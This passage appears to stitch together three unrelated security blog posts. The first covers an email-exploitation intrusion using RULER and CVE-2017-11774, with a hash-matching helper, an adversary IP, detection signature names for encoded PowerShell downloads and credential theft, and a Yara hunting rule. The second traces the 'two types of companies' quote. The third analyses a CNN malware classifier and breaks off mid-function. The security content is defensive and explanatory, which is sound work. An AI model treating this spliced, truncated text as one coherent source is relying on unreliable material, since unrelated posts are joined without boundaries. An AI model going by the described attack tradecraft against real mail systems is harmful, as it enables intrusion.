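    "e2d60bb6e3e67591e13b6a8178d89736", "2cd286711151efb61a15e2e11736d7d2",
    "bd80fcf5e70a0677ba94b3f7c011440e", "5a66480e100d4f14e12fceb60e91371d",
    "4047e238bbcec147f8b97d849ef40ce5", "f5ac89d406e698e169ba34fea59a780e",
    "c38069d0bc79acdc28af3820c1123e53", "4aca006b9afe85b1f11314b39ee270f7",
    "7f4f7e307a11f121d8659ca98bc8ba56",
    "53ae59ed03fa5df3bf738bc0775a91d9", "99649d58c0d502b2dfada02124b1504c",
}


def md5_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large files are not loaded into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_powerton_matches(root):
    """Return every file under `root` whose MD5 appears in Table 2 (hypothetical helper)."""
    matches = []
    for path in Path(root).rglob("*"):
        if path.is_file() and md5_of_file(path) in POWERTON_MD5:
            matches.append(path)
    return matches
```

Exact-hash matching only catches these specific files; any re-obfuscated copy of POWERTON would produce a different MD5.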

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are synonymous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose email server access to the public internet for their users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete, and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2018, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook was directly exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of the stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring a malicious payload via an Outlook rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than a domain-joined host communicating via SMB to a non-domain-joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.
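The path restriction described in the list above can be illustrated with a small classifier for the application path stored in a mail rule. This is a sketch under stated assumptions: the function name and category labels are hypothetical, the sample addresses use documentation ranges, and the `@` suffix check relies on the Windows convention of writing WebDAV UNC paths as `\\host@port\...` or `\\host@SSL\...`.

```python
import re

# \\host\rest or \\host@something\rest (the latter is the explicit WebDAV form).
UNC_PATTERN = re.compile(r"^\\\\(?P<host>[^\\@]+)(?P<dav>@[^\\]+)?\\(?P<rest>.+)$")
URL_PATTERN = re.compile(r"^[a-z][a-z0-9+.-]*://")


def classify_rule_payload_path(path):
    """Classify a rule's application path as 'url', 'unc-webdav', 'unc', or 'local'."""
    if URL_PATTERN.match(path.lower()):
        # Protocol handlers such as http:// or ftp://, which the rule dialog rejects.
        return "url"
    match = UNC_PATTERN.match(path)
    if match:
        # A plain UNC path may still be served over SMB or WebDAV.
        return "unc-webdav" if match.group("dav") else "unc"
    return "local"
```

For hunting purposes, a rule whose application path is a UNC path pointing at a host outside the organization is the interesting case, since a legitimate client-side rule would normally launch a program already on disk.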

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend that organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update  | RULER Module Addressed
June 13, 2017 Security Update      | RULER.RULES
September 12, 2017 Security Update | RULER.FORMS
October 10, 2017 Security Update   | RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detections for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM                   | SIGNATURE NAME
Endpoint Security          | POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
                           | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
                           | MIMIKATZ (CREDENTIAL STEALER)
                           | RULER OUTLOOK PERSISTENCE (UTILITY)
Network and Email Security | FE_Exploit_HTML_CVE201711774
                           | FE_HackTool_Win_RULER
                           | FE_HackTool_Linux_RULER
                           | FE_HackTool_OSX_RULER
                           | FE_Trojan_OLE_RULER
                           | HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
    meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}
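
For readers without a Yara engine at hand, the rule's condition can be approximated in plain Python. This is only a sketch of the same logic, not a replacement for Yara: the function names are hypothetical, "wide" is modelled as UTF-16LE, and "nocase" is modelled by lowercasing ASCII bytes.

```python
def _variants(text, nocase):
    """Return the ascii and wide (UTF-16LE) byte forms of a rule string."""
    forms = [text.encode("ascii"), text.encode("utf-16-le")]
    return [form.lower() for form in forms] if nocase else forms


def _contains(data, lowered, text, nocase):
    """Search the lowercased buffer for nocase strings, the raw buffer otherwise."""
    haystack = lowered if nocase else data
    return any(form in haystack for form in _variants(text, nocase))


def looks_like_homepage_payload(data):
    """Approximate the condition of Hunting_Outlook_Homepage_Shell_and_Persistence."""
    if data[:2] == b"MZ":  # uint16(0) == 0x5A4D means a PE file, which the rule excludes
        return False
    lowered = data.lower()
    # all of ($script*)
    has_scripts = all(_contains(data, lowered, s, True) for s in ("<htm", "<script"))
    # any of ($viewctl1*); the CLSID string has no nocase modifier in the rule
    has_viewctl = (
        _contains(data, lowered, "ViewCtl1", True)
        or _contains(data, lowered, "0006F063-0000-0000-C000-000000000046", False)
        or _contains(data, lowered, ".OutlookApplication", True)
    )
    return has_scripts and has_viewctl
```

A call such as `looks_like_homepage_payload(open(path, "rb").read())` would then flag candidate home page files for manual review.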

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

The Origin of the Quote “There Are Two Types of Companies”

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents, so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced version 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

Finally, there's a fourth version introduced by Mr Mueller's successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company, Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."

Now you know!


What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).
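To make the numbered steps above concrete, here is a deliberately tiny forward pass in pure Python. It is a sketch under several assumptions: the weights are random rather than trained, there is a single convolution and pooling stage instead of a hierarchy, the ReLU activation is our choice (the text does not name one), and all function and parameter names are hypothetical.

```python
import math
import random


def embed(byte_seq, table):
    """Step 2: replace each byte value with its n-dimensional vector."""
    return [table[b] for b in byte_seq]


def conv1d(embedded, filters, width):
    """Steps 3-4: slide a fixed-length window; each filter yields one activation per window."""
    out = []
    for start in range(len(embedded) - width + 1):
        window = [x for vec in embedded[start:start + width] for x in vec]
        out.append([max(0.0, sum(w * x for w, x in zip(f, window))) for f in filters])
    return out


def max_pool(activations, size):
    """Step 5: keep each filter's strongest activation within every block of `size` windows."""
    pooled = []
    for start in range(0, len(activations), size):
        block = activations[start:start + size]
        pooled.append([max(column) for column in zip(*block)])
    return pooled


def classify(features, weights, bias):
    """Step 6: one fully-connected unit with a sigmoid output (score near 1 means malware)."""
    z = bias + sum(w * x for w, x in zip(weights, features))
    return 1.0 / (1.0 + math.exp(-z))


def forward(byte_seq, params):
    embedded = embed(byte_seq, params["embedding"])
    acts = conv1d(embedded, params["filters"], params["width"])
    pooled = max_pool(acts, params["pool"])
    flat = [x for row in pooled for x in row]
    return classify(flat, params["dense"], params["bias"])


def random_params(seq_len, dim=4, n_filters=3, width=8, pool=16, seed=0):
    """Untrained placeholder weights sized for inputs of exactly `seq_len` bytes."""
    rng = random.Random(seed)
    n_windows = seq_len - width + 1
    n_pooled = -(-n_windows // pool)  # ceiling division
    return {
        "embedding": [[rng.uniform(-1, 1) for _ in range(dim)] for _ in range(256)],
        "filters": [[rng.uniform(-1, 1) for _ in range(dim * width)] for _ in range(n_filters)],
        "width": width,
        "pool": pool,
        "dense": [rng.uniform(-1, 1) for _ in range(n_pooled * n_filters)],
        "bias": 0.0,
    }
```

Calling `forward(data, random_params(len(data)))` on a short byte string returns a score between 0 and 1; with untrained weights the value is meaningless, but the data flow matches the six steps.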


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE file.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.
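The truncation and padding step can be sketched in a few lines. The padding index of 256 and the reading of 100KB as 100 * 1024 bytes are assumptions made for illustration; the text only says that a special padding symbol is used.

```python
PAD = 256  # hypothetical padding symbol, chosen outside the 0-255 byte range


def to_fixed_length(data, length=100 * 1024):
    """Truncate `data` to `length` symbols, or right-pad it with PAD."""
    symbols = list(data[:length])
    symbols.extend([PAD] * (length - len(symbols)))
    return symbols
```

With a dedicated padding symbol, the embedding table needs 257 rows rather than 256, so that padding can be learned separately from any real byte value.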

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition is that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.
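The outlier intuition can be illustrated without HDBSCAN itself. The sketch below swaps in a much simpler stand-in, a nearest-neighbor distance threshold, purely to show what "no nearby points" means; the function names and the threshold are hypothetical, and this is not the clustering used in the analysis.

```python
import math


def nearest_neighbor_distances(points):
    """For each point, the Euclidean distance to its closest other point."""
    distances = []
    for i, p in enumerate(points):
        distances.append(min(math.dist(p, q) for j, q in enumerate(points) if j != i))
    return distances


def find_outliers(points, threshold):
    """Indices of points whose nearest neighbor is farther away than `threshold`."""
    return [i for i, d in enumerate(nearest_neighbor_distances(points)) if d > threshold]
```

Applied to two-dimensional coordinates such as `[(0, 0), (0.1, 0), (0, 0.1), (5, 5)]` with a threshold of 1.0, only the last point is isolated. HDBSCAN reaches a similar kind of labeling without a hand-picked global threshold.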


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 is present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loopne and loop (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section (basically, any activation that occurs outside the valid bounds of the PE file) has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).
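Turning activation values into the locations discussed above takes two small steps: pick the strongest activations, then map their file offsets to a header or section name. The sketch below assumes a simplified section table of (name, raw offset, raw size) tuples rather than PEFile objects, and the "HEADER" label for offsets before the first section is our own assumption; "UNKNOWN" and "NULL" follow the meanings given for Figure 3.

```python
import heapq


def top_activation_offsets(activations, k, stride=1):
    """Return (file_offset, value) for the k strongest activations of one filter.

    activations[i] is assumed to be the filter output for the window that
    starts at byte i * stride.
    """
    top = heapq.nlargest(k, enumerate(activations), key=lambda pair: pair[1])
    return [(index * stride, value) for index, value in top]


def section_for_offset(offset, sections, headers_size):
    """Map a file offset to a section name using a simplified section table."""
    if offset < headers_size:
        return "HEADER"
    for name, start, size in sections:
        if start <= offset < start + size:
            return name or "NULL"  # empty section name
    return "UNKNOWN"  # not covered by any section, e.g. past the end of the file
```

Counting the returned labels over many files gives a histogram of the kind described for activation locations.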


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts are shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) are lost, and the classifier treats these as two completely independent features.
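The kind of pattern attributed to Filter 57, several push instructions followed by a call, can be mimicked with a naive byte scanner. This is a hand-written sketch, not what the filter computes: it recognizes only a few common 32-bit x86 push encodings (0x50-0x57, 0x6A, 0x68) and the relative call opcode 0xE8, and it scans bytes linearly instead of performing real disassembly, so false matches inside data are possible. All names are hypothetical.

```python
def push_length(code, i):
    """Length in bytes of a push instruction at offset i, or 0 if none is recognized."""
    op = code[i]
    if 0x50 <= op <= 0x57:  # push r32 (eax through edi)
        return 1
    if op == 0x6A:          # push imm8
        return 2
    if op == 0x68:          # push imm32
        return 5
    return 0


def find_push_call_sequences(code, min_pushes=2):
    """Return (offset, push_count) for runs of pushes immediately followed by call rel32."""
    hits = []
    i = 0
    while i < len(code):
        count, j = 0, i
        while j < len(code) and push_length(code, j):
            j += push_length(code, j)
            count += 1
        # A call rel32 is the 0xE8 opcode plus a 4-byte displacement.
        if count >= min_pushes and j + 5 <= len(code) and code[j] == 0xE8:
            hits.append((i, count))
            i = j + 5
        else:
            i += 1
    return hits
```

The push count returned for each hit is a rough analogue of "fingerprinting the number of parameters" for the called function.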


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activated on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: do the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.
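The meaning of signed SHAP values is easiest to see in a special case. For a linear model and a single baseline input, each feature's contribution is simply its weight times its difference from the baseline, and the contributions sum to the change in model output. The sketch below shows only that special case with hypothetical names; it is not GradientSHAP and says nothing about how the CNN was analyzed in practice.

```python
def linear_model(x, weights, bias):
    """A toy scoring function: higher output means 'more malicious'."""
    return bias + sum(w * v for w, v in zip(weights, x))


def linear_shap_values(x, baseline, weights):
    """Per-feature contributions of x relative to a baseline, for a linear model."""
    return [w * (v - b) for w, v, b in zip(weights, x, baseline)]
```

With weights `[2.0, -1.0, 0.5]`, input `[1, 3, 2]`, and an all-zero baseline, the first feature pushes the score up, the second pushes it down, and the sum of all contributions equals the difference between the model's output on the input and on the baseline.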

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).
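One simple way to relate per-byte SHAP values to structural features like these is to sum the values over known regions of the file and rank the regions. The sketch below does this for a made-up array of values; the region names, offsets, and numbers are hypothetical and do not come from our analysis.

```python
def summarize_by_region(values, regions):
    """Sum per-offset attribution values over named byte ranges.

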